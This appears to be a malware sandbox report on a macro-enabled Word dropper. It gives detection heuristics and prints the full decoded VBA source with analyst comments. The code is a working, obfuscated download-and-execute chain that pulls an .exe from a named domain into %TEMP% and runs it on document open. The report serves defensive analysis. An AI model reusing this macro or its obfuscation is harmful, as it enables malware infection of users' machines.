MALICIOUS
330
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1105 Ingress Tool Transfer
The file contains VBA macros, including a Document_Open subroutine, a common technique for initial execution. Critical heuristics indicate the use of WScript.Shell and Shell() calls, suggesting the macro is designed to download and execute a secondary payload. The obfuscation of the VBA code and the use of CreateObject("MSXML2.ServerXMLHTTP.6.0") point to downloader functionality.
Heuristics 10
-
ClamAV: Doc.Dropper.Donoff-5743530-0 — critical — CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Dropper.Donoff-5743530-0
-
VBA macros detected — medium — 5 related findings — OLE_VBA_MACROS: Document contains VBA macro code
-
WScript.Shell usage — critical — OLE_VBA_WSCRIPT: WScript.Shell usage. Matched line in script: `Public Function UKnBafgiv() As Object Set UKnBafgiv = CreateObject("WScript.Shell") End Function`
-
CreateObject call — high — OLE_VBA_CREATEOBJ: CreateObject call. Matched line in script: `Public Function CgmHP() As Object Set CgmHP = CreateObject("MSXML2.ServerXMLHTTP.6.0") End Function`
-
CallByName call — high — OLE_VBA_CALLBYNAME: CallByName call. Matched line in script: `Public Sub oxaqgX(ByVal KALgM As Object, ByVal eVWyJQj As String, ByVal aGcNNKfI As Variant, ByVal zynqJ As Variant) CallByName KALgM, eVWyJQj, 1, aGcNNKfI, zynqJ End Sub`
-
VBA p-code auto-exec with execution tokens — high — OLE_VBA_PCODE_AUTOEXEC_EXEC: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Document_Open macro — low — OLE_VBA_DOCOPEN: Document_Open macro. Matched line in script: `Attribute VB_Customizable = True Private Sub Document_Open() BVLQFe.MMikFosIjK`
-
Reference to Windows Script Host — high — SC_STR_WSCRIPT: Reference to Windows Script Host
-
Suspicious extracted artifact — medium — EXTRACTED_FILE_STATIC_TRIAGE: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL — info — EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main — in document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4098 bytes |

SHA-256: 2aa6747321bfc5aa61c7313107ee493022fad62526ac50f453f527a2083be182

Detection (this artifact) — ClamAV: No threats found. Obfuscation or payload: likely — 44 of 88 identifiers look randomly generated (e.g. 'ExWnvBRirWBonBmRxexnRt'), consistent with name-mangling obfuscation.
Preview script — first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Module: ThisDocument — the auto-execution entry point (OLE_VBA_DOCOPEN finding).
' Document_Open fires when the document is opened with macros enabled; its only
' action is to call BVLQFe.MMikFosIjK, the start of the download-and-execute
' chain in module BVLQFe. Nothing here is obfuscated; the obfuscation starts
' in the modules below.
Private Sub Document_Open()
BVLQFe.MMikFosIjK
End Sub
Attribute VB_Name = "DmNglmZeX"
' Module: DmNglmZeX — string de-obfuscation.
' nCLSXP(LQHkHRjSc, dTeZbLiVQ) returns LQHkHRjSc with every character that
' occurs anywhere in dTeZbLiVQ removed (PuFOaRrxM.CcyfQ is an InStr test,
' PuFOaRrxM.MzhytG is Mid(s, i, 1)). Every API name, the payload URL and the
' drop path in this sample are encoded this way, so this one function is the
' key to reading the sample: e.g. nCLSXP("BEixBecX", "B5XiJ") -> "Exec".
' The loop variable is not declared (no Option Explicit), so it is a Variant.
Public Function nCLSXP(ByVal LQHkHRjSc As String, ByVal dTeZbLiVQ As String) As String
Dim UwtKS As Boolean
For lZKqtZoIz = 1 To Len(LQHkHRjSc)
UwtKS = PuFOaRrxM.CcyfQ(dTeZbLiVQ, PuFOaRrxM.MzhytG(LQHkHRjSc, lZKqtZoIz))
If Not UwtKS Then
nCLSXP = nCLSXP & PuFOaRrxM.MzhytG(LQHkHRjSc, lZKqtZoIz)
End If
Next
End Function
Attribute VB_Name = "dtmzWzi"
' Module: dtmzWzi — late-bound COM invocation wrappers around CallByName.
' The numeric third argument is the VBA CallType: 1 = vbMethod (call a method),
' 2 = vbGet (read a property), 4 = vbLet (assign a property). Because the
' member name arrives as a runtime string (always produced by DmNglmZeX.nCLSXP),
' names such as Exec, Open, Send, Write or SaveToFile never appear as literals
' in the source — this is why the OLE_VBA_CALLBYNAME heuristic fired.

' Call method eVWyJQj on KALgM with two arguments.
Public Sub oxaqgX(ByVal KALgM As Object, ByVal eVWyJQj As String, ByVal aGcNNKfI As Variant, ByVal zynqJ As Variant)
CallByName KALgM, eVWyJQj, 1, aGcNNKfI, zynqJ
End Sub
' Read property RBfXrotO of KALgM (vbGet) and return its value.
Public Function VMcdEzBc(ByVal KALgM As Object, ByVal RBfXrotO As String) As Variant
VMcdEzBc = CallByName(KALgM, RBfXrotO, 2)
End Function
' Call method eVWyJQj on KALgM with no arguments.
Public Sub pvVyKHW(ByVal KALgM As Object, ByVal eVWyJQj As String)
CallByName KALgM, eVWyJQj, 1
End Sub
' Assign RzsaGG to property RBfXrotO of KALgM (vbLet).
Public Sub HcnoqyGD(ByVal KALgM As Object, ByVal RBfXrotO As String, ByVal RzsaGG As Variant)
CallByName KALgM, RBfXrotO, 4, RzsaGG
End Sub
' Call method eVWyJQj on KALgM with one argument.
Public Sub ebULIu(ByVal KALgM As Object, ByVal eVWyJQj As String, ByVal icAQhKfi As Variant)
CallByName KALgM, eVWyJQj, 1, icAQhKfi
End Sub
' Read indexed property eVWyJQj(icAQhKfi) of KALgM (vbGet) and return the
' object it yields; used for WScript.Shell.Environment("PROCESS").
Public Function KGUZKVAna(ByVal KALgM As Object, ByVal eVWyJQj As String, ByVal icAQhKfi As String) As Variant
Set KGUZKVAna = CallByName(KALgM, eVWyJQj, 2, icAQhKfi)
End Function
Attribute VB_Name = "SXArNj"
' Module: SXArNj — COM object factories. These three ProgIDs are the only
' plain-text literals in the sample and are what the OLE_VBA_CREATEOBJ and
' OLE_VBA_WSCRIPT heuristics matched on.

' HTTP client used for the download (MSXML2.ServerXMLHTTP.6.0).
Public Function CgmHP() As Object
Set CgmHP = CreateObject("MSXML2.ServerXMLHTTP.6.0")
End Function
' Binary stream used to write the downloaded bytes to disk (ADODB.Stream).
Public Function ScJdAxTtU() As Object
Set ScJdAxTtU = CreateObject("ADODB.Stream")
End Function
' Windows Script Host shell, used both to read the process environment and to
' execute the dropped file (WScript.Shell).
Public Function UKnBafgiv() As Object
Set UKnBafgiv = CreateObject("WScript.Shell")
End Function
Attribute VB_Name = "BVLQFe"
' Module: BVLQFe — the download-and-execute chain. Every string literal below
' goes through DmNglmZeX.nCLSXP, which strips the characters of the second
' argument from the first; the decoded value is noted next to each call.
' Call chain: Document_Open -> MMikFosIjK -> fubPB -> QzKYhsQi (HTTP GET)
' -> LbwvT (write to %TEMP%) -> AQzKw (WScript.Shell.Exec of the dropped file).

' Runs the dropped file: WScript.Shell.Exec(wsVLVo).
' "BEixBecX" / "B5XiJ" decodes to "Exec".
Private Sub AQzKw(ByVal wsVLVo As String)
dtmzWzi.ebULIu SXArNj.UKnBafgiv, DmNglmZeX.nCLSXP("BEixBecX", "B5XiJ"), wsVLVo
End Sub
' Downloads XNvCezNDB with ServerXMLHTTP and passes the response body to LbwvT
' together with the target path nPPRBCP. Decoded late-bound calls, in order:
' .Open "GET", url, False (synchronous); .Send; read .ResponseBody
' ("iRefsffp/onEsEe/fBiodfyO" / "3E/fOi"). No HTTP status is inspected.
Private Sub QzKYhsQi(ByVal XNvCezNDB As String, ByVal nPPRBCP As String)
Set HxZeTX = SXArNj.CgmHP
HxZeTX.Open DmNglmZeX.nCLSXP("gGEiTi", "Mhgi"), XNvCezNDB, False
dtmzWzi.pvVyKHW HxZeTX, DmNglmZeX.nCLSXP("FSewnadF", "WwFa")
LbwvT nPPRBCP, dtmzWzi.VMcdEzBc(HxZeTX, DmNglmZeX.nCLSXP("iRefsffp/onEsEe/fBiodfyO", "3E/fOi"))
End Sub
' Payload URL. Removing the characters A, C, 2 and W from the literal yields
' a plain-HTTP URL ending in /media/document.exe (IoC, defanged):
' hxxp://lawmate[.]com[.]au/media/document[.]exe
Private Function xhdZVSbFaj() As String
xhdZVSbFaj = DmNglmZeX.nCLSXP("WhCttWpCW:/2/2AlAawCCmaAtW2e.2cACo2m.W2auCC/m2CedCCi2a/WdCo2cWuCm2eWn22tW.AexCeW", "AC2W")
End Function
' Public entry point; the only member called from ThisDocument.Document_Open.
Public Sub MMikFosIjK()
fubPB
End Sub
' Writes bixPrNmocu (the raw HTTP response body) to nPPRBCP via ADODB.Stream.
' Decoded calls, in order: .Type = 1 (adTypeBinary); .Open; .Write body;
' .SaveToFile path, 2 (adSaveCreateOverWrite); .Close.
Private Sub LbwvT(ByVal nPPRBCP As String, ByVal bixPrNmocu As Variant)
Set uuSszHSuos = SXArNj.ScJdAxTtU
dtmzWzi.HcnoqyGD uuSszHSuos, DmNglmZeX.nCLSXP("TsHypPPe", "HdsP"), 1
dtmzWzi.pvVyKHW uuSszHSuos, DmNglmZeX.nCLSXP("IOpzeIn9", "9Iz")
dtmzWzi.ebULIu uuSszHSuos, DmNglmZeX.nCLSXP("WMnrQinteM", "nQM"), bixPrNmocu
dtmzWzi.oxaqgX uuSszHSuos, DmNglmZeX.nCLSXP("5Sanvne52ToVFVniVle2", "5Vn2"), nPPRBCP, 2
dtmzWzi.pvVyKHW uuSszHSuos, DmNglmZeX.nCLSXP("CZFlyosyeZ", "yFZ")
End Sub
' Orchestrator: download the payload URL to the %TEMP% drop path, then run it.
' On Error jumps to an empty label, so any failure (no network, a blocked COM
' object, the dropped file being quarantined) ends the macro silently with no
' prompt to the user. HxqUeJpZ is evaluated twice and yields the same path.
Private Sub fubPB()
On Error GoTo xvcAhTNUn
QzKYhsQi xhdZVSbFaj, HxqUeJpZ
AQzKw HxqUeJpZ
Exit Sub
xvcAhTNUn:
End Sub
' Reads process environment variable hoeftiv through
' WScript.Shell.Environment("PROCESS")(hoeftiv).
' "ExWnvBRirWBonBmRxexnRt" / "BxRW" -> "Environment"; "Pq RkOC ESkqS" / "Yqwk " -> "PROCESS".
Private Function wyqvpLN(ByVal hoeftiv As String) As String
Set UJtXdOEb = dtmzWzi.KGUZKVAna(SXArNj.UKnBafgiv, DmNglmZeX.nCLSXP("ExWnvBRirWBonBmRxexnRt", "BxRW"), DmNglmZeX.nCLSXP("Pq RkOC ESkqS", "Yqwk "))
wyqvpLN = UJtXdOEb(hoeftiv)
End Function
' Drop path: %TEMP% ("TXZEwMXP" / "ZXw" -> "TEMP") followed by the file name
' from UGmEsSJfqO. Detection hint: Word writing and then spawning an .exe
' directly under %TEMP%.
Private Function HxqUeJpZ() As String
HxqUeJpZ = wyqvpLN(DmNglmZeX.nCLSXP("TXZEwMXP", "ZXw")) & UGmEsSJfqO
End Function
' Fixed payload file name; decodes to "/cb3d763474.exe".
Private Function UGmEsSJfqO() As String
UGmEsSJfqO = DmNglmZeX.nCLSXP("Q/caabQ3Qd7a6T3T4a7Q4QE.eTTxae", "aEQT")
End Function
Attribute VB_Name = "PuFOaRrxM"
' Module: PuFOaRrxM — two trivial helpers split out only to keep Mid/InStr
' out of the decoder's body (adds nothing beyond indirection).

' Single character of IMEvRpz at 1-based position lZKqtZoIz.
Public Function MzhytG(ByVal IMEvRpz As String, ByVal lZKqtZoIz As Integer) As String
MzhytG = Mid(IMEvRpz, lZKqtZoIz, 1)
End Function
' True when VoOjTz occurs in IMEvRpz: InStr returns the match position (0 if
' absent) and the non-zero Long is coerced to the Boolean return value.
Public Function CcyfQ(ByVal IMEvRpz As String, ByVal VoOjTz As String) As Boolean
CcyfQ = InStr(1, IMEvRpz, VoOjTz)
End Function